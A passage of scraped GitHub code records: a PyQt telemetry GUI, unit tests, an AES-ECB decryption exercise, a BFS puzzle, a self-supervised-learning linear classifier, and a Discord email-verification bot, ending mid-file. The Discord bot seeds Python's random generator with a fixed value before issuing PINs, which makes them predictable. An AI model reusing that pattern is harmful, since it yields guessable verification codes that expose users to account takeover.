QHBoxLayout()\n pidy_dol.addLayout(P2)\n pidy_dol.addLayout(I2)\n pidy_dol.addLayout(D2)\n\n pidy = QVBoxLayout()\n pidy.addLayout(pidy_gora)\n pidy.addLayout(pidy_dol)\n\n #gorna linia aplikacji\n hbox1 = QHBoxLayout()\n #hbox1.addStretch(1)\n hbox1.addWidget(Wykres)\n hbox1.addWidget(mapa)\n\n\n #dolna linia aplikacji\n hbox2 = QHBoxLayout()\n hbox2.addLayout(pidy)\n hbox2.addWidget(kompas)\n hbox2.addLayout(strzalki)\n\n #zlozenie gornej i dolnej linii aplikacji\n vbox = QVBoxLayout()\n #vbox.addStretch(1)\n vbox.addLayout(hbox1)\n vbox.addLayout(hbox2)\n\n self.setLayout(vbox)\n\n self.setGeometry(300, 300, 300, 500)\n self.setWindowTitle('Telemetria Romka')\n self.show()\n\n\n\nif __name__ == '__main__':\n app = QApplication(sys.argv)\n ex = Example()\n sys.exit(app.exec_())", "repo_name": "UpdatedSnake/test-repository", "sub_path": "pr1/main.py", "file_name": "main.py", "file_ext": "py", "file_size_in_byte": 3823, "program_lang": "python", "lang": "es", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "86", "api": [{"api_name": "PyQt5.QtWidgets.QWidget", "line_number": 7, "usage_type": "name"}, {"api_name": "wykres.TestWindow", "line_number": 17, "usage_type": "call"}, {"api_name": "numpy.linspace", "line_number": 19, "usage_type": "call"}, {"api_name": "numpy.sin", "line_number": 20, "usage_type": "call"}, {"api_name": "numpy.cos", "line_number": 21, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets.QPushButton", "line_number": 29, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets.QPushButton", "line_number": 30, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets.QPushButton", "line_number": 31, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets.QPushButton", "line_number": 32, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets.QPushButton", "line_number": 33, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets.QPushButton", "line_number": 34, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets.QLineEdit", "line_number": 35, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets.QPushButton", "line_number": 36, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets.QPushButton", "line_number": 37, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets.QLineEdit", "line_number": 38, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets.QPushButton", "line_number": 39, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets.QPushButton", "line_number": 40, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets.QLineEdit", "line_number": 41, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets.QPushButton", "line_number": 42, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets.QPushButton", "line_number": 43, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets.QLineEdit", "line_number": 44, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets.QPushButton", "line_number": 45, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets.QPushButton", "line_number": 46, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets.QLineEdit", "line_number": 47, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets.QPushButton", "line_number": 48, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets.QPushButton", "line_number": 49, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets.QLineEdit", "line_number": 50, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets.QPushButton", "line_number": 51, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets.QPushButton", "line_number": 52, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets.QVBoxLayout", "line_number": 55, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets.QVBoxLayout", "line_number": 61, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets.QVBoxLayout", "line_number": 67, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets.QVBoxLayout", "line_number": 73, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets.QVBoxLayout", "line_number": 79, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets.QVBoxLayout", "line_number": 85, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets.QHBoxLayout", "line_number": 91, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets.QHBoxLayout", "line_number": 96, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets.QVBoxLayout", "line_number": 101, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets.QHBoxLayout", "line_number": 106, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets.QHBoxLayout", "line_number": 111, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets.QVBoxLayout", "line_number": 116, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets.QHBoxLayout", "line_number": 121, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets.QHBoxLayout", "line_number": 128, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets.QVBoxLayout", "line_number": 134, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets.QApplication", "line_number": 148, "usage_type": "call"}, {"api_name": "sys.argv", "line_number": 148, "usage_type": "attribute"}, {"api_name": "sys.exit", "line_number": 150, "usage_type": "call"}]} +{"seq_id": "7858409593", "text": "import datetime\n\nimport six\nfrom dateutil.parser import parse\n\nfrom scrapi import util\n\n\nclass TestScrapiUtils(object):\n\n def test_copy_to_unicode(self):\n converted = util.copy_to_unicode('test')\n\n assert converted == u'test'\n assert isinstance(converted, six.text_type)\n\n def test_timestamp(self):\n timestamp = util.timestamp()\n parsed = parse(timestamp)\n\n assert isinstance(parsed, datetime.datetime)\n\n def test_stamp_from_raw(self):\n raw_doc = {'doc': 'Macho Man Story', 'timestamps': {}}\n new_stamps = {'done': 'now'}\n\n stamped_raw = util.stamp_from_raw(raw_doc, **new_stamps)\n\n assert isinstance(stamped_raw, dict)\n assert set(stamped_raw.keys()) == set(['done', 'normalizeFinished'])\n", "repo_name": "CenterForOpenScience/scrapi", "sub_path": "tests/test_utils.py", "file_name": "test_utils.py", "file_ext": "py", "file_size_in_byte": 776, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 41, "dataset": "github-code", "pt": "86", "api": [{"api_name": "scrapi.util.copy_to_unicode", "line_number": 12, "usage_type": "call"}, {"api_name": "scrapi.util", "line_number": 12, "usage_type": "name"}, {"api_name": "six.text_type", "line_number": 15, "usage_type": "attribute"}, {"api_name": "scrapi.util.timestamp", "line_number": 18, "usage_type": "call"}, {"api_name": "scrapi.util", "line_number": 18, "usage_type": "name"}, {"api_name": "dateutil.parser.parse", "line_number": 19, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 21, "usage_type": "attribute"}, {"api_name": "scrapi.util.stamp_from_raw", "line_number": 27, "usage_type": "call"}, {"api_name": "scrapi.util", "line_number": 27, "usage_type": "name"}]} +{"seq_id": "17663844317", "text": "#!/usr/bin/python3\n\nfrom Crypto.Cipher import AES\nimport base64\n\ndef decryptAES_ECB(enc):\n key = \"YELLOW SUBMARINE\"\n mode = AES.MODE_ECB\n aes = AES.new(key, mode)\n return aes.decrypt(enc)\n\nif __name__ == \"__main__\":\n t3 = \"\"\n with open('7.txt', 'r') as myfile:\n t3=myfile.read().replace('\\n', '')\n t3 = base64.b64decode(t3)\n print(\"Decrypted:\")\n print(decryptAES_ECB(t3).decode('latin1')[:256])\n", "repo_name": "tezeb/matasano", "sub_path": "s1/c7.py", "file_name": "c7.py", "file_ext": "py", "file_size_in_byte": 429, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "86", "api": [{"api_name": "Crypto.Cipher.AES.MODE_ECB", "line_number": 8, "usage_type": "attribute"}, {"api_name": "Crypto.Cipher.AES", "line_number": 8, "usage_type": "name"}, {"api_name": "Crypto.Cipher.AES.new", "line_number": 9, "usage_type": "call"}, {"api_name": "Crypto.Cipher.AES", "line_number": 9, "usage_type": "name"}, {"api_name": "base64.b64decode", "line_number": 16, "usage_type": "call"}]} +{"seq_id": "74838430364", "text": "import discord, sys, re, yagmail, random\n\n\nyag = yagmail.SMTP(\"username\", \"password\")\n\nrandom.seed(1)\n\ntoken = \"token\"\n\nclient = discord.Client()\nid = None\nunverified = {}\n\n@client.event\nasync def on_member_join(member):\n\t\n\tglobal unverified\n\n\tunverified.update({member.id: None})\n\tawait member.send(\"Welcome. Please type the email address you registered with to confirm your identity.\")\n\n@client.event\nasync def on_message(message):\n\n\tglobal unverified\n\n\tif message.author.id in unverified:\n\t\tif re.match(\"^\\S*@\\S*\\.\\S*$\", message.content) is not None:\n\n\t\t\tpin = random.randint(100000, 999999)\n\t\t\tunverified.update({message.author.id: pin})\n\n\t\t\temail = [\n\t\t\t\t\"Please type the pin below into the ID-Check bot channel to verify email.\\n\"\n\t\t\t\t\"PIN: {}\".format(pin)\n\t\t\t]\n\n\t\t\tyag.send(message.content, 'subject', email)\n\n\t\t\tawait message.author.send(\"Verification email has been sent.\")\n\t\t\n\t\telif re.match(\"\\d{6}\", message.content) is not None:\n\n\t\t\tif int(message.content) == unverified[message.author.id]:\n\n\t\t\t\tprint(\"{} has been verified\".format(message.author))\n\t\t\t\tdel unverified[message.author.id]\n\n\ntry:\n\tclient.run(token)\nexcept KeyboardInterrupt:\n\tsys.exit()", "repo_name": "clodi99/2FA-discord-bot", "sub_path": "bot.py", "file_name": "bot.py", "file_ext": "py", "file_size_in_byte": 1162, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "86", "api": [{"api_name": "yagmail.SMTP", "line_number": 4, "usage_type": "call"}, {"api_name": "random.seed", "line_number": 6, "usage_type": "call"}, {"api_name": "discord.Client", "line_number": 10, "usage_type": "call"}, {"api_name": "re.match", "line_number": 28, "usage_type": "call"}, {"api_name": "random.randint", "line_number": 30, "usage_type": "call"}, {"api_name": "re.match", "line_number": 42, "usage_type": "call"}, {"api_name": "sys.exit", "line_number": 53, "usage_type": "call"}]} +{"seq_id": "11113613562", "text": "import sys\nfrom collections import deque\n\ndef bfs(graph,visited, n, x, y):\n q = deque()\n q.append([x,y])\n\n visited[x][y] = True\n dx = [0,0,1,-1]\n dy = [1,-1,0,0]\n\n while q:\n a,b = q.popleft()\n for i in range(4):\n nx = a + dx[i]\n ny = b + dy[i]\n if 0<=nx<n and 0<=ny<n:\n if visited[nx][ny] == False:\n if graph[a][b] == graph[nx][ny]:\n q.append([nx,ny])\n visited[nx][ny] = True\n\n\nn = int(sys.stdin.readline().rstrip())\n\ngraph = [ list(map(str, sys.stdin.readline().rstrip())) for _ in range(n) ]\nvisited = [ [False]*n for _ in range(n) ]\n\n\ncount = 0\ncount_no = 0\nfor i in range(n):\n for j in range(n):\n if visited[i][j] == False:\n bfs(graph,visited, n, i, j)\n count+=1\n # if visited_no[i][j] == False:\n # bfs(graph_no, visited_no, n, i, j)\n # count_no+=1\n\nvisited = [ [False]*n for _ in range(n)]\nfor i in range(n):\n for j in range(n):\n if graph[i][j] == 'R' or graph[i][j] == 'G':\n graph[i][j] = 'S'\n\nfor i in range(n):\n for j in range(n):\n if visited[i][j] == False:\n bfs(graph,visited, n, i, j)\n count_no+=1\n # if visited_no[i][j] == False:\n # bfs(graph_no, visited_no, n, i, j)\n # count_no+=1\n\nprint(count,count_no)", "repo_name": "yutan0565/Algorithm_python", "sub_path": "BH/05_코딩테스트 알고리즘 정복 3단계 BFS_DFS (난이도 중)/10026_적록색약.py", "file_name": "10026_적록색약.py", "file_ext": "py", "file_size_in_byte": 1405, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 2, "dataset": "github-code", "pt": "86", "api": [{"api_name": "collections.deque", "line_number": 5, "usage_type": "call"}, {"api_name": "sys.stdin.readline", "line_number": 24, "usage_type": "call"}, {"api_name": "sys.stdin", "line_number": 24, "usage_type": "attribute"}, {"api_name": "sys.stdin.readline", "line_number": 26, "usage_type": "call"}, {"api_name": "sys.stdin", "line_number": 26, "usage_type": "attribute"}]} +{"seq_id": "75057304284", "text": "from argparse import ArgumentParser\nimport glob\nfrom argparse import ArgumentParser\nimport json\n\nimport torch\nfrom torch import nn\nfrom torch.nn import functional as F\nfrom pytorch_lightning import LightningModule\nfrom torch.utils import data\nfrom torchmetrics import Accuracy, R2Score\n#from sklearn.metrics import r2_score\n\nfrom barlow_twins_yao_training.barlowtwins_module import BarlowTwins\nfrom huy_Supervised_models_training_CIFAR10.module import CIFAR10Module\nfrom bolt_self_supervised_training.simclr.simclr_module import SimCLR\nfrom bolt_self_supervised_training.simsiam.simsiam_module import SimSiam\n\nfrom huy_Supervised_models_training_CIFAR10.module import Causal3DidentModel\n\n\nclass SSL_encoder_linear_classifier(LightningModule):\n ''' This is an self-supervised learning module + linear classifier added to the last layer.\n So we can use the SSL encoder for classification. \n It also includes the info about training and optimizer. \n This can also be a regressor in case of 3dident.\n '''\n def __init__(self, model, path, dataset='cifar10', regress_latents=False, classify_spotlight=False, feature_num=512, class_num=10, optimizer=None, learning_rate=1, loading=False, **kwargs):\n ''' model: the type of SSL model to use as encoder\n path: the chekpoint for the best model chekpoint\n feature_num: number of output features for the unsupervised model\n class_num: number of classes, if regress_latents then the number of latents to regress.\n regress_latents: in case of 3dident whether to classify objects or regress latents.\n '''\n super().__init__()\n if not loading:\n self.save_hyperparameters()\n self.optim = optimizer\n self.lr = learning_rate\n\n self.dataset = dataset\n self.regress_latents = regress_latents\n self.classify_spotlight = classify_spotlight\n\n #the masurement is accuracy\n self.train_acc = Accuracy()\n self.val_acc = Accuracy()\n \n \"\"\" # or coefficient of determination (hacky), seperated to be able to report them individually.\n self.train_r2_scores = []\n self.val_r2_scores = []\n for i in range(class_num):\n self.train_r2_scores.append(R2Score())\n self.val_r2_scores.append(R2Score())\n # register the metrics properly as a child.\n self.train_r2_scores = nn.ModuleList(self.train_r2_scores)\n self.val_r2_scores = nn.ModuleList(self.val_r2_scores) \"\"\"\n\n \"\"\" self.train_spotlight_R2 = R2Score()\n self.val_spotlight_R2 = R2Score() \"\"\"\n\n\n if dataset == '3dident' and classify_spotlight:\n class_num = 3\n else:\n class_num = 10\n \n\n # disable the gradient of encoder and put it in eval mode\n self.encoder = Encoder(model, path, dataset)\n # add a linear layer (#features to #classes) \n self.final_linear_layer = nn.Linear(feature_num, class_num)\n\n def forward(self, x):\n features = self.encoder(x)\n return self.final_linear_layer(features)\n\n def shared_step(self, batch, mode):\n # note for each batch we get: \n # cifar: data, target, index \n # 3dident: data, target, latents\n if self.dataset == 'cifar10' :\n x, y, _ = batch\n y_hat = self(x)\n loss = F.cross_entropy(y_hat, y)\n\n self.log(f'{mode}_classification_loss', loss, on_step=False, on_epoch=True)\n\n if mode == 'train':\n acc = self.train_acc(y_hat, y)\n else:\n acc = self.val_acc(y_hat, y)\n self.log(f'{mode}_acc', acc, on_step=False, on_epoch=True)\n \n elif self.classify_spotlight:\n images, _, latents = batch\n\n # get classes\n labels = Causal3DidentModel.spotlight_label_from_latent(latents)\n labels = labels.to(images.device)\n # filter outputs \n images = images[labels != -1]\n # filter labels\n labels = labels[labels != -1]\n\n outputs = self(images)\n\n _, predictions = torch.max(outputs, 1)\n loss = F.cross_entropy(outputs, labels)\n self.log(f'{mode}_classification_loss', loss) #, on_step=True, on_epoch=True)\n\n if mode == 'train':\n acc = self.train_acc(predictions, labels)\n else:\n acc = self.val_acc(predictions, labels)\n self.log(f'{mode}_acc', acc) #, on_step=True, on_epoch=True)\n\n\n \"\"\" There is a problem with speed and logging gives error\n elif self.dataset == '3dident' and self.regress_latents:\n x, object_class, latents = batch\n y_hat = self(x)\n loss = F.mse_loss(y_hat, latents)\n\n self.log(f'{mode}_regession_loss', loss, on_step=False, on_epoch=True)\n\n if mode == 'train':\n for i, r2_score in enumerate(self.train_r2_scores):\n r2_score(y_hat[:,i], latents[:,i])\n self.log(f'train_R^2/{i}', r2_score, on_step=False, on_epoch=True)\n else: \n for i, r2_score in enumerate(self.val_r2_scores):\n r2_score(y_hat[:,i], latents[:,i])\n self.log(f'val_R^2/{i}', r2_score, on_step=False, on_epoch=True)\n \n if mode =='train':\n r2 = self.train_spotlight_R2(y_hat[:,6], latents[:,6])\n else:\n r2 = self.val_spotlight_R2(y_hat[:,6], latents[:,6])\n \n self.log(f'{mode}_R^2_spotlight', r2, on_step=False, on_epoch=True) \n\n else:\n raise NotImplementedError('dataset or regression type not implemented !') \"\"\"\n\n\n return loss\n\n\n def training_step(self, batch, batch_nb):\n\n return self.shared_step(batch, mode='train')\n \n def validation_step(self, batch, batch_idx):\n\n return self.shared_step(batch, mode='val')\n\n\n def configure_optimizers(self):\n # only optimize the linear layer !\n if self.optim == 'adam':\n return torch.optim.Adam(self.final_linear_layer.parameters(), lr=self.lr)\n else:\n raise NotImplemented('that optimizer is not implemented.')\n\n @classmethod\n def load_from_checkpoint(\n cls,\n checkpoint_path,\n mode,\n from_version=True,\n map_location = None,\n hparams_file = None,\n strict: bool = True,\n **kwargs,\n ):\n '''I overwrite the load for easier loading. \n\n mode: 'standard' or 'robust' determins how to choose the checkpoint\n\n from_version: if True It is enough to specify the version. I will choose the best checkpoint. \n if False you can pass a specific checkpoint from a version.\n '''\n\n if from_version:\n if mode == 'standard':\n # go to chekpoint choose the only checpoint and load it.\n # lightining uses the hparam file to initialize the model which loades the encoder automatically.\n chkpts = glob.glob(checkpoint_path+\"/checkpoints/*\")\n if len(chkpts)==1:\n print('Loading: ' + chkpts[0])\n return super().load_from_checkpoint(chkpts[0], map_location, hparams_file, strict, **kwargs)\n elif len(chkpts)==0:\n raise FileNotFoundError('No checkpoints were found !')\n else:\n raise NotImplementedError('Multiple checkpoints found. This standard loading is not implemented')\n \n elif mode == 'robust':\n # this correspnds to my libraries results\n # look for the checkpoint starting with best in its name\n chkpts = glob.glob(checkpoint_path+\"/checkpoints/best*.pt\")\n if len(chkpts)==1:\n chpt = chkpts[0]\n print(\"loading: \" + chpt)\n # find the hparams file and load the encoder network\n hparams_path = checkpoint_path + '/commandline_args.txt'\n with open(hparams_path, 'r') as f:\n hparams = json.load(f)\n \n # load the encoder (for some reason running save_hparams throws an error, thats why I added the loading flag.)\n model = cls(hparams['model'], hparams['path'], loading=True)\n # load the linear layer\n model_dict = torch.load(chpt) \n bias = model_dict['model.final_linear_layer.bias']\n weights = model_dict['model.final_linear_layer.weight']\n model.final_linear_layer.weight = torch.nn.Parameter(weights)\n model.final_linear_layer.bias = torch.nn.Parameter(bias)\n\n return model\n\n elif len(chkpts)==0:\n raise FileNotFoundError('No checkpoints were found !')\n \n else:\n raise NotImplementedError('This robust loading is not implemented')\n\n\n else:\n if mode == 'standard':\n return super().load_from_checkpoint(checkpoint_path, map_location, hparams_file, strict, **kwargs)\n \n elif mode == 'robust':\n raise NotADirectoryError()\n\n \n\n\n @staticmethod\n def add_model_specific_args(parent_parser):\n parser = ArgumentParser(parents=[parent_parser], add_help=False)\n\n # model params\n parser.add_argument('model', type=str, choices=['barlow_twins', 'simCLR', 'simsiam', 'supervised'], help='model type')\n parser.add_argument('device', type=int, help='cuda device number, e.g 2 means cuda:2') \n parser.add_argument('path', type=str, help='path to model chekpoint') \n parser.add_argument('--feature_num', type=int, help='number of output features for the unsupervised model, for resnet18 it is 512', default=512) \n parser.add_argument('--class_num', type=int, help='number of classes' ,default=10)\n\n parser.add_argument('--regress_latents', action='store_true', help='used for regressing 3dident')\n parser.add_argument('--classify_spotlight', action='store_true', help='used for classifying 3dident apotlight')\n \n # transform params\n parser.add_argument(\"--dataset\", type=str, default=\"cifar10\")\n\n # training params\n parser.add_argument('--batch_size', type=int, default=512, help='batch size for training the final linear layer')\n parser.add_argument(\"--optimizer\", default=\"adam\", type=str, choices=['adam']) \n parser.add_argument(\"--max_epochs\", default= 5, type=int, help=\"number of total epochs to run\")\n parser.add_argument(\"--learning_rate\", default=1e-2, type=float, help=\"learning rate\")\n\n #fast_dev_run\n #This flag runs a “unit test” by running n if set to n (int) else 1 if set to True \n # training and validation batch(es). The point is to detect any bugs in the training/validation loop \n # without having to wait for a full epoch to crash.\n parser.add_argument(\"--fast_dev_run\", action='store_true', default=False)\n \n\n\n return parser\n\n\n\n\nfrom pl_bolts.models.self_supervised.resnets import resnet18 as lit_ssl_resnet18\n\nclass huy_supervised(LightningModule):\n '''only load the encoder part of the supervised model to train the last layer like other SSL models'''\n def __init__(self, dataset, classifier='resnet18'):\n #super().__init__(classifier=classifier)\n super().__init__()\n if dataset == 'cifar10':\n self.model = lit_ssl_resnet18(first_conv=False, maxpool1=False, return_all_feature_maps=False)\n elif dataset == '3dident':\n self.model = lit_ssl_resnet18(first_conv=True, maxpool1=True, return_all_feature_maps=False)\n\n def forward(self, x):\n # exclude the last linear layer\n # bolt models return a list\n return self.model(x)[-1]\n\n \nfrom collections import OrderedDict\n\nclass Encoder(LightningModule):\n '''This is the model (mostly Resnet18) that has been trained using unsupervised learning.\n The point of the module is to load the encoder part of the main model and keep the model's\n requires_grad to False and in eval mode. \n '''\n\n def __init__(self, model, path, dataset):\n super().__init__()\n self.model = model\n # load pretrained unsupervised model\n # Important: in lightining the 'load_from_checkpoint' method ,unlike pytorch, returns the loaded model \n # IN LIGHTINING LOADING DOESN'T HAPPEN IN PLACE, IT IS RETURNED !! \n\n # For lightining models\n # we need to use lightinings own loading method, there is a top linear layer added durin unsupervised learning \n # and setting strict to False ignores that.(\"non_linear_evaluator.block_forward.2.weight\", \"non_linear_evaluator.block_forward.2.bias\".)\n # the forward method only applies the encoder and not the projector. so no need to call encoder.\n\n # Possible improvement For some of the models the forward calculates the unused one layer projection(s) as well which might slightly slow them down. \n\n if model == 'barlow_twins':\n # lightining\n encoder = BarlowTwins.load_from_checkpoint(path, strict=False)\n self.encoder = encoder\n # flatten output of encoder \n self.pre_process = nn.Flatten()\n \n\n elif model == 'simCLR':\n # lightining\n encoder = SimCLR.load_from_checkpoint(path, strict=False)\n self.encoder = encoder\n self.pre_process = nn.Flatten()\n\n elif model =='simsiam':\n #lightining \n encoder = SimSiam.load_from_checkpoint(path, strict=False)\n self.encoder = encoder\n self.pre_process = nn.Flatten()\n\n elif model == 'supervised':\n encoder = huy_supervised.load_from_checkpoint(path, dataset=dataset, strict=False)\n self.encoder = encoder\n self.pre_process = nn.Flatten()\n\n else:\n raise NotImplementedError('This encoder for SSL is not supported yet.')\n \n \n self.freeze()\n\n\n def forward(self,x):\n encoder_result = self.encoder(x)\n features = self.pre_process(encoder_result)\n\n return features \n\n def setup(self, device: torch.device):\n '''makes all requires_grad of parameters False and sets the model in eval mode.'''\n self.freeze()\n\n def train(self, mode: bool):\n ''' avoid pytorch lighting auto set trian mode. keep it in eval. '''\n return super().train(False)\n\n def requires_grad_(self, requires_grad: bool):\n return super().requires_grad_(False)\n\n def state_dict(self, destination, prefix, keep_vars):\n ''' (probably needs to be fixed!) avoid pytorch lighting auto save params '''\n destination = OrderedDict()\n destination._metadata = OrderedDict()\n return destination", "repo_name": "kfarivar/Masters_thesis", "sub_path": "models/SSL_linear_classifier.py", "file_name": "SSL_linear_classifier.py", "file_ext": "py", "file_size_in_byte": 15157, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "86", "api": [{"api_name": "pytorch_lightning.LightningModule", "line_number": 22, "usage_type": "name"}, {"api_name": "torchmetrics.Accuracy", "line_number": 46, "usage_type": "call"}, {"api_name": "torchmetrics.Accuracy", "line_number": 47, "usage_type": "call"}, {"api_name": "torch.nn.Linear", "line_number": 72, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 72, "usage_type": "name"}, {"api_name": "torch.nn.functional.cross_entropy", "line_number": 85, "usage_type": "call"}, {"api_name": "torch.nn.functional", "line_number": 85, "usage_type": "name"}, {"api_name": "huy_Supervised_models_training_CIFAR10.module.Causal3DidentModel.spotlight_label_from_latent", "line_number": 99, "usage_type": "call"}, {"api_name": "huy_Supervised_models_training_CIFAR10.module.Causal3DidentModel", "line_number": 99, "usage_type": "name"}, {"api_name": "torch.max", "line_number": 108, "usage_type": "call"}, {"api_name": "torch.nn.functional.cross_entropy", "line_number": 109, "usage_type": "call"}, {"api_name": "torch.nn.functional", "line_number": 109, "usage_type": "name"}, {"api_name": "torch.optim.Adam", "line_number": 162, "usage_type": "call"}, {"api_name": "torch.optim", "line_number": 162, "usage_type": "attribute"}, {"api_name": "glob.glob", "line_number": 189, "usage_type": "call"}, {"api_name": "glob.glob", "line_number": 201, "usage_type": "call"}, {"api_name": "json.load", "line_number": 208, "usage_type": "call"}, {"api_name": "torch.load", "line_number": 213, "usage_type": "call"}, {"api_name": "torch.nn.Parameter", "line_number": 216, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 216, "usage_type": "attribute"}, {"api_name": "torch.nn.Parameter", "line_number": 217, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 217, "usage_type": "attribute"}, {"api_name": "argparse.ArgumentParser", "line_number": 240, "usage_type": "call"}, {"api_name": "pytorch_lightning.LightningModule", "line_number": 276, "usage_type": "name"}, {"api_name": "pl_bolts.models.self_supervised.resnets.resnet18", "line_number": 282, "usage_type": "call"}, {"api_name": "pl_bolts.models.self_supervised.resnets.resnet18", "line_number": 284, "usage_type": "call"}, {"api_name": "pytorch_lightning.LightningModule", "line_number": 294, "usage_type": "name"}, {"api_name": "barlow_twins_yao_training.barlowtwins_module.BarlowTwins.load_from_checkpoint", "line_number": 316, "usage_type": "call"}, {"api_name": "barlow_twins_yao_training.barlowtwins_module.BarlowTwins", "line_number": 316, "usage_type": "name"}, {"api_name": "torch.nn.Flatten", "line_number": 319, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 319, "usage_type": "name"}, {"api_name": "bolt_self_supervised_training.simclr.simclr_module.SimCLR.load_from_checkpoint", "line_number": 324, "usage_type": "call"}, {"api_name": "bolt_self_supervised_training.simclr.simclr_module.SimCLR", "line_number": 324, "usage_type": "name"}, {"api_name": "torch.nn.Flatten", "line_number": 326, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 326, "usage_type": "name"}, {"api_name": "bolt_self_supervised_training.simsiam.simsiam_module.SimSiam.load_from_checkpoint", "line_number": 330, "usage_type": "call"}, {"api_name": "bolt_self_supervised_training.simsiam.simsiam_module.SimSiam", "line_number": 330, "usage_type": "name"}, {"api_name": "torch.nn.Flatten", "line_number": 332, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 332, "usage_type": "name"}, {"api_name": "torch.nn.Flatten", "line_number": 337, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 337, "usage_type": "name"}, {"api_name": "torch.device", "line_number": 352, "usage_type": "attribute"}, {"api_name": "collections.OrderedDict", "line_number": 365, "usage_type": "call"}, {"api_name": "collections.OrderedDict", "line_number": 366, "usage_type": "call"}]} +{"seq_id": "7459006461", "text": "import pytest\nimport pony\n\ntest_case_files = (\n\t('input.txt', 'output.txt'),\n\t('C-small-practice.in', 'C-small-practice.out'),\n\t('C-large-practice.in', 'C-large-practice.out'),\n\t)\n\ndef ingest_google_test_case_output(fpath):\n\twith open(fpath) as input:\n\t\t\n\t\tanswers = []\n\t\tcase_nr = 1\n\t\tfor line in input.readlines():\n\t\t\tif 'Case' not in line:\n\t\t\t\tcontinue\n\t\t\ta = line.split(':')[1]\n\t\t\ta = a.split()\n\t\t\ta = tuple(map(float, a))\n\t\t\tanswers.append(a)\n\treturn answers\n\t\ntc = []\nfor i, o in test_case_files:\n\t_tc = pony.ingest_google_test_cases(i)\n\tanswers = ingest_google_test_case_output(o)\n\tassert(len(_tc) == len(answers))\n\tfor x in range(len(_tc)):\n\t\t_tc[x]['answers'] = answers[x]\n\ttc.extend(_tc)\n\t\nimport pprint; pprint.pprint(tc)\n\t\n@pytest.mark.parametrize('tc', tc)\ndef test_fastest_routes(tc):\n\troute_lookup = pony.solve_fastest_routes(tc)\n\tanswers = [route_lookup[src-1][dst-1] for src, dst in tc['queries']]\t\t\n\tfor x in range(len(answers)):\n\t\tassert pytest.approx(answers[x], abs=1e-6, rel=1e-6) == tc['answers'][x]\n\t#assert answers == pytest.approx(tc['answers'])", "repo_name": "thewopr/pony", "sub_path": "test_pony.py", "file_name": "test_pony.py", "file_ext": "py", "file_size_in_byte": 1071, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "86", "api": [{"api_name": "pony.ingest_google_test_cases", "line_number": 26, "usage_type": "call"}, {"api_name": "pprint.pprint", "line_number": 33, "usage_type": "call"}, {"api_name": "pony.solve_fastest_routes", "line_number": 37, "usage_type": "call"}, {"api_name": "pytest.approx", "line_number": 40, "usage_type": "call"}, {"api_name": "pytest.mark.parametrize", "line_number": 35, "usage_type": "call"}, {"api_name": "pytest.mark", "line_number": 35, "usage_type": "attribute"}]} +{"seq_id": "18259695342", "text": "\"\"\"Set and assert required app directories.\"\"\"\n\nimport os\nfrom pathlib import Path\n\nBASE_DIR = Path(__file__).resolve().parent.parent\n\nPRIMER3_PATH = os.path.join(\n BASE_DIR,\n 'design',\n 'primer3',\n 'src',\n 'primer3_core'\n)\nPRIMER3_CONFIG_PATH = os.path.join(\n BASE_DIR,\n 'design',\n 'primer3',\n 'src',\n 'primer3_config'\n)\nPRIMER3_INPUT_DIR = os.path.join(\n BASE_DIR,\n 'design',\n 'primer3',\n 'input_files'\n)\nPRIMER3_OUTPUT_DIR = os.path.join(\n BASE_DIR,\n 'design',\n 'primer3',\n 'output_files'\n)\nPROBE_SEQUENCE_PATH = os.path.join(\n BASE_DIR,\n 'design',\n 'probes',\n 'roche_upl_sequences.json'\n)\nPATHS = [\n 